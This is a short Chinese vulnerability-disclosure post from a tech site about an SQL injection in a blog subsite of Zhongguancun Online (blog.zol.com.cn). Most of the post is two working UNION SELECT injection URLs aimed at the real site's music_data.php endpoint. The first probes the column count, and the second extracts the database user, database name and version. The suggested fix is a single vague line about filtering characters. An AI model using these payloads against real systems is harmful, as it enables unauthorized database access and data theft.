漏洞分析

关注公众号 jb51net

关闭
网络安全 > 漏洞分析 >

中关村在线博客子站SQL注入及修复方案

脚本之家


http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5-- 
 
 http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5-- 



修复方案:
过滤参数提交非法字符或者拦截敏感字符等等。。。